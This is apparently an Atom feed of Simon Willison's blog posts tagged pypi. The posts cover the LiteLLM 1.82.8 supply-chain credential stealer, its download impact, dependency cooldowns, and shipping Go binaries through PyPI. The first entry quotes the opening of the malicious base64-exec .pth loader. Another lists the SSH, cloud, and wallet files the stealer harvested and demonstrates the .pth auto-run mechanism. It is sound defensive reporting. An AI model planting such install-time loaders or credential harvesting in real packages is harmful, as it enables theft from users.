<?xml version="1.0" encoding="utf-8"?>
<feed xml:lang="en-us" xmlns="http://www.w3.org/2005/Atom"><title>Simon Willison's Weblog: pypi</title><link href="http://simonwillison.net/" rel="alternate"/><link href="http://simonwillison.net/tags/pypi.atom" rel="self"/><id>http://simonwillison.net/</id><updated>2026-03-26T23:58:22+00:00</updated><author><name>Simon Willison</name></author><entry><title>My minute-by-minute response to the LiteLLM malware attack</title><link href="https://simonwillison.net/2026/Mar/26/response-to-the-litellm-malware-attack/#atom-tag" rel="alternate"/><published>2026-03-26T23:58:22+00:00</published><updated>2026-03-26T23:58:22+00:00</updated><id>https://simonwillison.net/2026/Mar/26/response-to-the-litellm-malware-attack/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://futuresearch.ai/blog/litellm-attack-transcript/"&gt;My minute-by-minute response to the LiteLLM malware attack&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Callum McMahon reported the &lt;a href="https://simonwillison.net/2026/Mar/24/malicious-litellm/"&gt;LiteLLM malware attack&lt;/a&gt; to PyPI. Here he shares the Claude transcripts that helped him confirm the compromise and decide what to do about it. Claude even suggested the PyPI security contact address after confirming the malicious code in a Docker container:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Confirmed&lt;/strong&gt;. Fresh download from PyPI right now in an isolated Docker container:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Inspecting: litellm-1.82.8-py3-none-any.whl
FOUND: litellm_init.pth
SIZE: 34628 bytes
FIRST 200 CHARS:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The malicious &lt;code&gt;litellm==1.82.8&lt;/code&gt; is &lt;strong&gt;live on PyPI right now&lt;/strong&gt; and anyone installing or upgrading litellm will be infected. This needs to be reported to security@pypi.org immediately.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I was chuffed to see Callum use my &lt;a href="https://github.com/simonw/claude-code-transcripts"&gt;claude-code-transcripts&lt;/a&gt; tool to publish the transcript of the conversation.&lt;/p&gt;

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=47531967"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/supply-chain"&gt;supply-chain&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="pypi"/><category term="security"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="claude"/><category term="supply-chain"/><category term="ai-security-research"/></entry><entry><title>LiteLLM Hack: Were You One of the 47,000?</title><link href="https://simonwillison.net/2026/Mar/25/litellm-hack/#atom-tag" rel="alternate"/><published>2026-03-25T17:21:04+00:00</published><updated>2026-03-25T17:21:04+00:00</updated><id>https://simonwillison.net/2026/Mar/25/litellm-hack/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://futuresearch.ai/blog/litellm-hack-were-you-one-of-the-47000/"&gt;LiteLLM Hack: Were You One of the 47,000?&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Daniel Hnyk used the &lt;a href="https://console.cloud.google.com/bigquery?p=bigquery-public-data&amp;amp;d=pypi"&gt;BigQuery PyPI dataset&lt;/a&gt; to determine how many downloads there were of &lt;a href="https://simonwillison.net/2026/Mar/24/malicious-litellm/"&gt;the exploited LiteLLM packages&lt;/a&gt; during the 46-minute period they were live on PyPI. The answer was 46,996 across the two compromised release versions (1.82.7 and 1.82.8).&lt;/p&gt;
&lt;p&gt;They also identified 2,337 packages that depended on LiteLLM - 88% of which did not pin versions in a way that would have avoided the exploited versions.&lt;/p&gt;
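&lt;p&gt;To illustrate what that pinning difference looks like in a &lt;code&gt;requirements.txt&lt;/code&gt; (the 1.82.6 version here is just a stand-in for whatever safe release a project had pinned):&lt;/p&gt;

```
litellm==1.82.6    # exact pin: cannot resolve to the compromised 1.82.8
litellm>=1.74      # open range: resolves to the newest release, compromised or not
```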

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://twitter.com/hnykda/status/2036834100342825369"&gt;@hnykda&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/packaging"&gt;packaging&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/supply-chain"&gt;supply-chain&lt;/a&gt;&lt;/p&gt;



</summary><category term="packaging"/><category term="pypi"/><category term="python"/><category term="security"/><category term="supply-chain"/></entry><entry><title>Package Managers Need to Cool Down</title><link href="https://simonwillison.net/2026/Mar/24/package-managers-need-to-cool-down/#atom-tag" rel="alternate"/><published>2026-03-24T21:11:38+00:00</published><updated>2026-03-24T21:11:38+00:00</updated><id>https://simonwillison.net/2026/Mar/24/package-managers-need-to-cool-down/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://nesbitt.io/2026/03/04/package-managers-need-to-cool-down.html"&gt;Package Managers Need to Cool Down&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Today's &lt;a href="https://simonwillison.net/2026/Mar/24/malicious-litellm/"&gt;LiteLLM supply chain attack&lt;/a&gt; inspired me to revisit the idea of &lt;a href="https://simonwillison.net/2025/Nov/21/dependency-cooldowns/"&gt;dependency cooldowns&lt;/a&gt;, the practice of only installing updated dependencies once they've been out in the wild for a few days to give the community a chance to spot if they've been subverted in some way.&lt;/p&gt;
&lt;p&gt;This recent (March 4th) piece by Andrew Nesbitt reviews the current state of dependency cooldown mechanisms across packaging tools. It's surprisingly well supported! There's been a flurry of activity across major packaging tools, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://pnpm.io/blog/releases/10.16#new-setting-for-delayed-dependency-updates"&gt;pnpm 10.16&lt;/a&gt; (September 2025) — &lt;code&gt;minimumReleaseAge&lt;/code&gt; with &lt;code&gt;minimumReleaseAgeExclude&lt;/code&gt; for trusted packages&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/yarnpkg/berry/releases/tag/%40yarnpkg%2Fcli%2F4.10.0"&gt;Yarn 4.10.0&lt;/a&gt; (September 2025) — &lt;code&gt;npmMinimalAgeGate&lt;/code&gt; (in minutes) with &lt;code&gt;npmPreapprovedPackages&lt;/code&gt; for exemptions&lt;/li&gt;
&lt;li&gt;&lt;a href="https://bun.com/blog/bun-v1.3#minimum-release-age"&gt;Bun 1.3&lt;/a&gt; (October 2025) — &lt;code&gt;minimumReleaseAge&lt;/code&gt; via &lt;code&gt;bunfig.toml&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://deno.com/blog/v2.6#controlling-dependency-stability"&gt;Deno 2.6&lt;/a&gt; (December 2025) — &lt;code&gt;--minimum-dependency-age&lt;/code&gt; for &lt;code&gt;deno update&lt;/code&gt; and &lt;code&gt;deno outdated&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/astral-sh/uv/releases/tag/0.9.17"&gt;uv 0.9.17&lt;/a&gt; (December 2025) — added relative duration support to existing &lt;code&gt;--exclude-newer&lt;/code&gt;, plus per-package overrides via &lt;code&gt;exclude-newer-package&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://ichard26.github.io/blog/2026/01/whats-new-in-pip-26.0/"&gt;pip 26.0&lt;/a&gt; (January 2026) — &lt;code&gt;--uploaded-prior-to&lt;/code&gt; (absolute timestamps only; &lt;a href="https://github.com/pypa/pip/issues/13674"&gt;relative duration support requested&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://socket.dev/blog/npm-introduces-minimumreleaseage-and-bulk-oidc-configuration"&gt;npm 11.10.0&lt;/a&gt; (February 2026) — &lt;code&gt;min-release-age&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;code&gt;pip&lt;/code&gt; currently only supports absolute rather than relative dates, but Seth Larson &lt;a href="https://sethmlarson.dev/pip-relative-dependency-cooling-with-crontab"&gt;has a workaround for that&lt;/a&gt; using a scheduled cron job to update the absolute date in the &lt;code&gt;pip.conf&lt;/code&gt; config file.&lt;/p&gt;
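&lt;p&gt;The idea behind that workaround can be sketched in a few lines of Python: regenerate the config on a schedule so the absolute cutoff always trails the current time by a fixed cooldown. The &lt;code&gt;uploaded-prior-to&lt;/code&gt; config key name here is an assumption based on the CLI flag - check Seth's post for the exact config he uses.&lt;/p&gt;

```python
# Sketch: write a pip config whose absolute timestamp cutoff trails "now"
# by a three-day cooldown. Run daily (e.g. from cron) to approximate the
# relative cooldowns other package managers support natively.
from datetime import datetime, timedelta, timezone

COOLDOWN = timedelta(days=3)
cutoff = datetime.now(timezone.utc) - COOLDOWN
config = "[install]\nuploaded-prior-to = {}\n".format(
    cutoff.strftime("%Y-%m-%dT%H:%M:%SZ")
)
print(config)
```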


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/javascript"&gt;javascript&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/packaging"&gt;packaging&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pip"&gt;pip&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/npm"&gt;npm&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/deno"&gt;deno&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/supply-chain"&gt;supply-chain&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/uv"&gt;uv&lt;/a&gt;&lt;/p&gt;



</summary><category term="javascript"/><category term="packaging"/><category term="pip"/><category term="pypi"/><category term="python"/><category term="security"/><category term="npm"/><category term="deno"/><category term="supply-chain"/><category term="uv"/></entry><entry><title>Malicious litellm_init.pth in litellm 1.82.8 — credential stealer</title><link href="https://simonwillison.net/2026/Mar/24/malicious-litellm/#atom-tag" rel="alternate"/><published>2026-03-24T15:07:31+00:00</published><updated>2026-03-24T15:07:31+00:00</updated><id>https://simonwillison.net/2026/Mar/24/malicious-litellm/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/BerriAI/litellm/issues/24512"&gt;Malicious litellm_init.pth in litellm 1.82.8 — credential stealer&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The LiteLLM v1.82.8 package published to PyPI was compromised with a particularly nasty credential stealer hidden in base64 in a &lt;code&gt;litellm_init.pth&lt;/code&gt; file, which means installing the package is enough to trigger it even without running &lt;code&gt;import litellm&lt;/code&gt;.&lt;/p&gt;
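&lt;p&gt;The mechanism being abused here is a documented Python feature: at interpreter startup the &lt;code&gt;site&lt;/code&gt; module executes any line in a &lt;code&gt;.pth&lt;/code&gt; file that begins with &lt;code&gt;import&lt;/code&gt;. This harmless sketch simulates that using &lt;code&gt;site.addsitedir()&lt;/code&gt; against a temporary directory instead of a real &lt;code&gt;site-packages&lt;/code&gt;:&lt;/p&gt;

```python
# Demonstrates the .pth trick: lines starting with "import" in a .pth file
# are executed when the directory is processed as a site dir - normally at
# interpreter startup, here simulated with site.addsitedir().
import os
import site
import tempfile

d = tempfile.mkdtemp()
with open(os.path.join(d, "demo_init.pth"), "w") as f:
    # A benign stand-in for the malicious litellm_init.pth payload
    f.write("import builtins; builtins.PTH_RAN = True\n")

site.addsitedir(d)  # the code inside the .pth file runs right here
print(PTH_RAN)  # True - and no package was ever explicitly imported
```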
&lt;p&gt;(1.82.7 had the exploit as well but it was in the &lt;code&gt;proxy/proxy_server.py&lt;/code&gt; file so the package had to be imported for it to take effect.)&lt;/p&gt;
&lt;p&gt;This issue has a very detailed description of what the credential stealer does. There's more information about the timeline of the exploit &lt;a href="https://github.com/BerriAI/litellm/issues/24518"&gt;over here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;PyPI has already &lt;a href="https://pypi.org/help/#project_in_quarantine"&gt;quarantined&lt;/a&gt; the &lt;a href="https://pypi.org/project/litellm/"&gt;litellm package&lt;/a&gt; so the window for compromise was just a few hours, but if you DID install the package it would have hoovered up a bewildering array of secrets, including &lt;code&gt;~/.ssh/&lt;/code&gt;, &lt;code&gt;~/.gitconfig&lt;/code&gt;, &lt;code&gt;~/.git-credentials&lt;/code&gt;, &lt;code&gt;~/.aws/&lt;/code&gt;, &lt;code&gt;~/.kube/&lt;/code&gt;, &lt;code&gt;~/.config/&lt;/code&gt;, &lt;code&gt;~/.azure/&lt;/code&gt;, &lt;code&gt;~/.docker/&lt;/code&gt;, &lt;code&gt;~/.npmrc&lt;/code&gt;, &lt;code&gt;~/.vault-token&lt;/code&gt;, &lt;code&gt;~/.netrc&lt;/code&gt;, &lt;code&gt;~/.lftprc&lt;/code&gt;, &lt;code&gt;~/.msmtprc&lt;/code&gt;, &lt;code&gt;~/.my.cnf&lt;/code&gt;, &lt;code&gt;~/.pgpass&lt;/code&gt;, &lt;code&gt;~/.mongorc.js&lt;/code&gt;, &lt;code&gt;~/.bash_history&lt;/code&gt;, &lt;code&gt;~/.zsh_history&lt;/code&gt;, &lt;code&gt;~/.sh_history&lt;/code&gt;, &lt;code&gt;~/.mysql_history&lt;/code&gt;, &lt;code&gt;~/.psql_history&lt;/code&gt;, &lt;code&gt;~/.rediscli_history&lt;/code&gt;, &lt;code&gt;~/.bitcoin/&lt;/code&gt;, &lt;code&gt;~/.litecoin/&lt;/code&gt;, &lt;code&gt;~/.dogecoin/&lt;/code&gt;, &lt;code&gt;~/.zcash/&lt;/code&gt;, &lt;code&gt;~/.dashcore/&lt;/code&gt;, &lt;code&gt;~/.ripple/&lt;/code&gt;, &lt;code&gt;~/.bitmonero/&lt;/code&gt;, &lt;code&gt;~/.ethereum/&lt;/code&gt;, &lt;code&gt;~/.cardano/&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;It looks like this supply chain attack started with the &lt;a href="https://www.crowdstrike.com/en-us/blog/from-scanner-to-stealer-inside-the-trivy-action-supply-chain-compromise/"&gt;recent exploit&lt;/a&gt; against &lt;a href="https://trivy.dev/"&gt;Trivy&lt;/a&gt;, ironically a security scanner tool that was used in CI &lt;a href="https://github.com/BerriAI/litellm/blob/9343aeefca37aa49a6ea54397d7615adae5c72c9/ci_cd/security_scans.sh#L16"&gt;by LiteLLM&lt;/a&gt;. The Trivy exploit likely resulted in stolen PyPI credentials which were then used to directly publish the vulnerable packages.&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/open-source"&gt;open-source&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/supply-chain"&gt;supply-chain&lt;/a&gt;&lt;/p&gt;



</summary><category term="open-source"/><category term="pypi"/><category term="python"/><category term="security"/><category term="supply-chain"/></entry><entry><title>Distributing Go binaries like sqlite-scanner through PyPI using go-to-wheel</title><link href="https://simonwillison.net/2026/Feb/4/distributing-go-binaries/#atom-tag" rel="alternate"/><published>2026-02-04T14:59:47+00:00</published><updated>2026-02-04T14:59:47+00:00</updated><id>https://simonwillison.net/2026/Feb/4/distributing-go-binaries/#atom-tag</id><summary type="html">
    &lt;p&gt;I've been exploring Go for building small, fast and self-contained binary applications recently. I'm enjoying how there's generally one obvious way to do things and the resulting code is boring and readable - and something that LLMs are very competent at writing. The one catch is distribution, but it turns out publishing Go binaries to PyPI means any Go binary can be just a &lt;code&gt;uvx package-name&lt;/code&gt; call away.&lt;/p&gt;
&lt;h4 id="sqlite-scanner"&gt;sqlite-scanner&lt;/h4&gt;
&lt;p&gt;&lt;a href="https://github.com/simonw/sqlite-scanner"&gt;sqlite-scanner&lt;/a&gt; is my new Go CLI tool for scanning a filesystem for SQLite database files.&lt;/p&gt;
&lt;p&gt;It works by checking if the first 16 bytes of the file exactly match the SQLite magic number sequence &lt;code&gt;SQLite format 3\x00&lt;/code&gt;. It can search one or more folders recursively, spinning up concurrent goroutines to accelerate the scan. It streams out results as it finds them in plain text, JSON or newline-delimited JSON. It can optionally display the file sizes as well.&lt;/p&gt;
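&lt;p&gt;The core check is simple enough to sketch in a few lines of Python - the real tool is written in Go, so this is just an illustration of the logic:&lt;/p&gt;

```python
# Sketch of the detection logic: a SQLite database file always begins with
# the 16-byte header string "SQLite format 3\x00".
import os
import sqlite3
import tempfile

MAGIC = b"SQLite format 3\x00"

def is_sqlite(path):
    with open(path, "rb") as f:
        return f.read(16) == MAGIC

# Create a real SQLite database and a plain text file to compare
tmp = tempfile.mkdtemp()
db = os.path.join(tmp, "demo.db")
conn = sqlite3.connect(db)
conn.execute("CREATE TABLE t (id INTEGER)")
conn.commit()
conn.close()

other = os.path.join(tmp, "notes.txt")
with open(other, "w") as f:
    f.write("not a database")

print(is_sqlite(db), is_sqlite(other))  # True False
```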
&lt;p&gt;To try it out you can download a release from the &lt;a href="https://github.com/simonw/sqlite-scanner/releases"&gt;GitHub releases&lt;/a&gt; - and then &lt;a href="https://support.apple.com/en-us/102445"&gt;jump through macOS hoops&lt;/a&gt; to execute an "unsafe" binary. Or you can clone the repo and compile it with Go. Or... you can run the binary like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;uvx sqlite-scanner
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;By default this will search your current directory for SQLite databases. You can pass one or more directories as arguments:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;uvx sqlite-scanner ~ /tmp
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Add &lt;code&gt;--json&lt;/code&gt; for JSON output, &lt;code&gt;--size&lt;/code&gt; to include file sizes or &lt;code&gt;--jsonl&lt;/code&gt; for newline-delimited JSON. Here's a demo:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;uvx sqlite-scanner ~ --jsonl --size
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2025/sqlite-scanner-demo.gif" alt="running that command produces a sequence of JSON objects, each with a path and a size key" style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;If you haven't been uv-pilled yet you can instead install &lt;code&gt;sqlite-scanner&lt;/code&gt; using &lt;code&gt;pip install sqlite-scanner&lt;/code&gt; and then run &lt;code&gt;sqlite-scanner&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;To get a permanent copy with &lt;code&gt;uv&lt;/code&gt; use &lt;code&gt;uv tool install sqlite-scanner&lt;/code&gt;.&lt;/p&gt;
&lt;h4 id="how-the-python-package-works"&gt;How the Python package works&lt;/h4&gt;
&lt;p&gt;The reason this is worth doing is that &lt;code&gt;pip&lt;/code&gt;, &lt;code&gt;uv&lt;/code&gt; and &lt;a href="https://pypi.org/"&gt;PyPI&lt;/a&gt; will work together to identify the correct compiled binary for your operating system and architecture.&lt;/p&gt;
&lt;p&gt;This is driven by file names. If you visit &lt;a href="https://pypi.org/project/sqlite-scanner/#files"&gt;the PyPI downloads for sqlite-scanner&lt;/a&gt; you'll see the following files:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;sqlite_scanner-0.1.1-py3-none-win_arm64.whl&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;sqlite_scanner-0.1.1-py3-none-win_amd64.whl&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;sqlite_scanner-0.1.1-py3-none-musllinux_1_2_x86_64.whl&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;sqlite_scanner-0.1.1-py3-none-musllinux_1_2_aarch64.whl&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;sqlite_scanner-0.1.1-py3-none-manylinux_2_17_x86_64.whl&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;sqlite_scanner-0.1.1-py3-none-manylinux_2_17_aarch64.whl&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;sqlite_scanner-0.1.1-py3-none-macosx_11_0_arm64.whl&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;sqlite_scanner-0.1.1-py3-none-macosx_10_9_x86_64.whl&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;When I run &lt;code&gt;pip install sqlite-scanner&lt;/code&gt; or &lt;code&gt;uvx sqlite-scanner&lt;/code&gt; on my Apple Silicon Mac laptop Python's packaging magic ensures I get that &lt;code&gt;macosx_11_0_arm64.whl&lt;/code&gt; variant.&lt;/p&gt;
&lt;p&gt;Here's &lt;a href="https://tools.simonwillison.net/zip-wheel-explorer?url=https%3A%2F%2Ffiles.pythonhosted.org%2Fpackages%2F88%2Fb1%2F17a716635d2733fec53ba0a8267f85bd6b6cf882c6b29301bc711fba212c%2Fsqlite_scanner-0.1.1-py3-none-macosx_11_0_arm64.whl#sqlite_scanner/__init__.py"&gt;what's in the wheel&lt;/a&gt;, which is a zip file with a &lt;code&gt;.whl&lt;/code&gt; extension.&lt;/p&gt;
&lt;p&gt;In addition to the &lt;code&gt;bin/sqlite-scanner&lt;/code&gt; binary, the most important file is &lt;code&gt;sqlite_scanner/__init__.py&lt;/code&gt;, which includes the following:&lt;/p&gt;
&lt;pre&gt;&lt;span class="pl-k"&gt;def&lt;/span&gt; &lt;span class="pl-en"&gt;get_binary_path&lt;/span&gt;():
    &lt;span class="pl-s"&gt;"""Return the path to the bundled binary."""&lt;/span&gt;
    &lt;span class="pl-s1"&gt;binary&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-s1"&gt;os&lt;/span&gt;.&lt;span class="pl-c1"&gt;path&lt;/span&gt;.&lt;span class="pl-c1"&gt;join&lt;/span&gt;(&lt;span class="pl-s1"&gt;os&lt;/span&gt;.&lt;span class="pl-c1"&gt;path&lt;/span&gt;.&lt;span class="pl-c1"&gt;dirname&lt;/span&gt;(&lt;span class="pl-s1"&gt;__file__&lt;/span&gt;), &lt;span class="pl-s"&gt;"bin"&lt;/span&gt;, &lt;span class="pl-s"&gt;"sqlite-scanner"&lt;/span&gt;)
 
    &lt;span class="pl-c"&gt;# Ensure binary is executable on Unix&lt;/span&gt;
    &lt;span class="pl-k"&gt;if&lt;/span&gt; &lt;span class="pl-s1"&gt;sys&lt;/span&gt;.&lt;span class="pl-c1"&gt;platform&lt;/span&gt; &lt;span class="pl-c1"&gt;!=&lt;/span&gt; &lt;span class="pl-s"&gt;"win32"&lt;/span&gt;:
        &lt;span class="pl-s1"&gt;current_mode&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-s1"&gt;os&lt;/span&gt;.&lt;span class="pl-c1"&gt;stat&lt;/span&gt;(&lt;span class="pl-s1"&gt;binary&lt;/span&gt;).&lt;span class="pl-c1"&gt;st_mode&lt;/span&gt;
        &lt;span class="pl-k"&gt;if&lt;/span&gt; &lt;span class="pl-c1"&gt;not&lt;/span&gt; (&lt;span class="pl-s1"&gt;current_mode&lt;/span&gt; &lt;span class="pl-c1"&gt;&amp;amp;&lt;/span&gt; &lt;span class="pl-s1"&gt;stat&lt;/span&gt;.&lt;span class="pl-c1"&gt;S_IXUSR&lt;/span&gt;):
            &lt;span class="pl-s1"&gt;os&lt;/span&gt;.&lt;span class="pl-c1"&gt;chmod&lt;/span&gt;(&lt;span class="pl-s1"&gt;binary&lt;/span&gt;, &lt;span class="pl-s1"&gt;current_mode&lt;/span&gt; &lt;span class="pl-c1"&gt;|&lt;/span&gt; &lt;span class="pl-s1"&gt;stat&lt;/span&gt;.&lt;span class="pl-c1"&gt;S_IXUSR&lt;/span&gt; &lt;span class="pl-c1"&gt;|&lt;/span&gt; &lt;span class="pl-s1"&gt;stat&lt;/span&gt;.&lt;span class="pl-c1"&gt;S_IXGRP&lt;/span&gt; &lt;span class="pl-c1"&gt;|&lt;/span&gt; &lt;span class="pl-s1"&gt;stat&lt;/span&gt;.&lt;span class="pl-c1"&gt;S_IXOTH&lt;/span&gt;)
 
    &lt;span class="pl-k"&gt;return&lt;/span&gt; &lt;span class="pl-s1"&gt;binary&lt;/span&gt;
 
 
&lt;span class="pl-k"&gt;def&lt;/span&gt; &lt;span class="pl-en"&gt;main&lt;/span&gt;():
    &lt;span class="pl-s"&gt;"""Execute the bundled binary."""&lt;/span&gt;
    &lt;span class="pl-s1"&gt;binary&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-en"&gt;get_binary_path&lt;/span&gt;()
 
    &lt;span class="pl-k"&gt;if&lt;/span&gt; &lt;span class="pl-s1"&gt;sys&lt;/span&gt;.&lt;span class="pl-c1"&gt;platform&lt;/span&gt; &lt;span class="pl-c1"&gt;==&lt;/span&gt; &lt;span class="pl-s"&gt;"win32"&lt;/span&gt;:
        &lt;span class="pl-c"&gt;# On Windows, use subprocess to properly handle signals&lt;/span&gt;
        &lt;span class="pl-s1"&gt;sys&lt;/span&gt;.&lt;span class="pl-c1"&gt;exit&lt;/span&gt;(&lt;span class="pl-s1"&gt;subprocess&lt;/span&gt;.&lt;span class="pl-c1"&gt;call&lt;/span&gt;([&lt;span class="pl-s1"&gt;binary&lt;/span&gt;] &lt;span class="pl-c1"&gt;+&lt;/span&gt; &lt;span class="pl-s1"&gt;sys&lt;/span&gt;.&lt;span class="pl-c1"&gt;argv&lt;/span&gt;[&lt;span class="pl-c1"&gt;1&lt;/span&gt;:]))
    &lt;span class="pl-k"&gt;else&lt;/span&gt;:
        &lt;span class="pl-c"&gt;# On Unix, exec replaces the process&lt;/span&gt;
        &lt;span class="pl-s1"&gt;os&lt;/span&gt;.&lt;span class="pl-c1"&gt;execvp&lt;/span&gt;(&lt;span class="pl-s1"&gt;binary&lt;/span&gt;, [&lt;span class="pl-s1"&gt;binary&lt;/span&gt;] &lt;span class="pl-c1"&gt;+&lt;/span&gt; &lt;span class="pl-s1"&gt;sys&lt;/span&gt;.&lt;span class="pl-c1"&gt;argv&lt;/span&gt;[&lt;span class="pl-c1"&gt;1&lt;/span&gt;:])&lt;/pre&gt;
&lt;p&gt;That &lt;code&gt;main()&lt;/code&gt; method - also called from &lt;code&gt;sqlite_scanner/__main__.py&lt;/code&gt; - locates the binary and executes it when the Python package itself is executed, using the &lt;code&gt;sqlite-scanner = sqlite_scanner:main&lt;/code&gt; entry point defined in the wheel.&lt;/p&gt;
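&lt;p&gt;In &lt;code&gt;pyproject.toml&lt;/code&gt; terms that entry point looks something like this sketch (&lt;code&gt;go-to-wheel&lt;/code&gt; writes the equivalent metadata into the wheel for you):&lt;/p&gt;

```toml
[project.scripts]
sqlite-scanner = "sqlite_scanner:main"
```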
&lt;h4 id="which-means-we-can-use-it-as-a-dependency"&gt;Which means we can use it as a dependency&lt;/h4&gt;
&lt;p&gt;Using PyPI as a distribution platform for Go binaries feels a tiny bit abusive, though &lt;a href="https://simonwillison.net/2022/May/23/bundling-binary-tools-in-python-wheels/"&gt;there is plenty of precedent&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I’ll justify it by pointing out that this means &lt;strong&gt;we can use Go binaries as dependencies&lt;/strong&gt; for other Python packages now.&lt;/p&gt;
&lt;p&gt;That's genuinely useful! It means that any functionality which is available in a cross-platform Go binary can now be subsumed into a Python package. Python is really good at running subprocesses so this opens up a whole world of useful tricks that we can bake into our Python tools.&lt;/p&gt;
&lt;p&gt;To demonstrate this, I built &lt;a href="https://github.com/simonw/datasette-scan"&gt;datasette-scan&lt;/a&gt; - a new Datasette plugin which depends on &lt;code&gt;sqlite-scanner&lt;/code&gt; and then uses that Go binary to scan a folder for SQLite databases and attach them to a Datasette instance.&lt;/p&gt;
&lt;p&gt;Here's how to use that (without even installing anything first, thanks &lt;code&gt;uv&lt;/code&gt;) to explore any SQLite databases in your Downloads folder:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;uv run --with datasette-scan datasette scan &lt;span class="pl-k"&gt;~&lt;/span&gt;/Downloads&lt;/pre&gt;&lt;/div&gt;
